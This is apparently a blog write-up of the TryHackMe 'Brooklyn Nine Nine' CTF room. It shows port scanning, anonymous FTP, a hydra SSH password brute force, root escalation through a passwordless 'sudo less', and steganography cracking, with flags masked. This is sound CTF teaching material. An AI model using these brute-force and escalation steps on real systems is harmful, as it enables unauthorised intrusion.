Having fun with TryHackMe again. So, here is the write up and guideline to pass this Brooklyn 99 challenge.
Task: This room is aimed for beginner level hackers but anyone can try to hack this box. There are two main intended ways to root the box.
Lets get started
The task says there is 2 method to access the root. Lets go all the way if can find it
As usual, open the IP in browser first.
There is a hint “Have you ever heard of steganography?”. Might be something from the wallpaper. Because Im too lazy, using online decoder, unfortunately, nothing!
But it’s okay, let’s run both
# gobuster dir -u 10.10.61.X -w wordlists/dirb/common.txt -t 20
No luck from
gobuster. Tried different directory dict also no luck.
# nmap -T4 -A -sS -sS -p- 10.10.61.61
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
| FTP server status:
| Connected to ::ffff:10.8.163.74
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Thats interesting. It says that FTP is allow anonymous login. Using Cyberduck,
There is only 1 file there says,
Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine
There is no admin page or whatsoever, then SSH all the way using “jake” as username and brute the password
# hydra -l jake -P wordlists/rockyou.txt 10.10.162.161 ssh
[DATA] attacking ssh://10.10.162.161:22/
[ssh] host: 10.10.162.161 login: jake password: XXXXXXXXX
Ok that was easy.
# ssh firstname.lastname@example.org
The authenticity of host '10.10.162.161 (10.10.162.161)' can't be established.
ECDSA key fingerprint is SHA256:Ofp49Dp4VBPb3v/vGM9jYfTRiwpg2v28x1uGhvoJ7K4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.162.161' (ECDSA) to the list of known hosts.
Last login: Tue May 26 08:56:58 2020jake@brookly_nine_nine:~$
Lets go through,
# ls /home
amy holt jake
# ls -al holt
-rw------- 1 root root 110 May 18 2020 nano.save
-rw-rw-r-- 1 holt holt 33 May 17 2020 user.txt
# cat /home/holt/user.txt
Ok now, user flag is captured. Now, we need to find the root hole.
# sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jake may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /usr/bin/less
Oh! less command doesn’t need password. Let’s refer GTFObins then. Run this,
sudo less /etc/profile
Now root shell is available!
# ls -al /root
-rw-r--r-- 1 root root 135 May 18 2020 root.txt# cat /root/root.txt
-- Creator : Fsociety2006 --Congratulations in rooting Brooklyn Nine NineHere is the flag: 63a9f0ea7bb98050796bXXXXXXXXXXXXXEnjoy!!
Found the root flag!!.
BUT, if the CTF stated that there is another way to access the server. Let’s check first, SSH done✅ , FTP done✅, Directory brute ✅. What else missing? There is only 1 hint from the source code is “steganography”. But failed to decode earlier right? Password then? Where is the password?
Crack the password using stegcracker from github
# stegcracker ~/Downloads/brooklyn99.jpg ~/wordlists/rockyou.txt
Successfully cracked file with password: XXXXX Tried 20650 passwords Your file has been written to: /home/kapalbiru/Downloads/brooklyn99.jpg.out
Alright.. got the password
# steghide extract -sf ~/Downloads/brooklyn99.jpg Enter passphrase: wrote extracted data to "note.txt".
# cat note.txt
Holts Password: XXXXXXXXXXXXXXXXXXXXXXXXX
So now make sense. That’s why user flag is located in holts folder.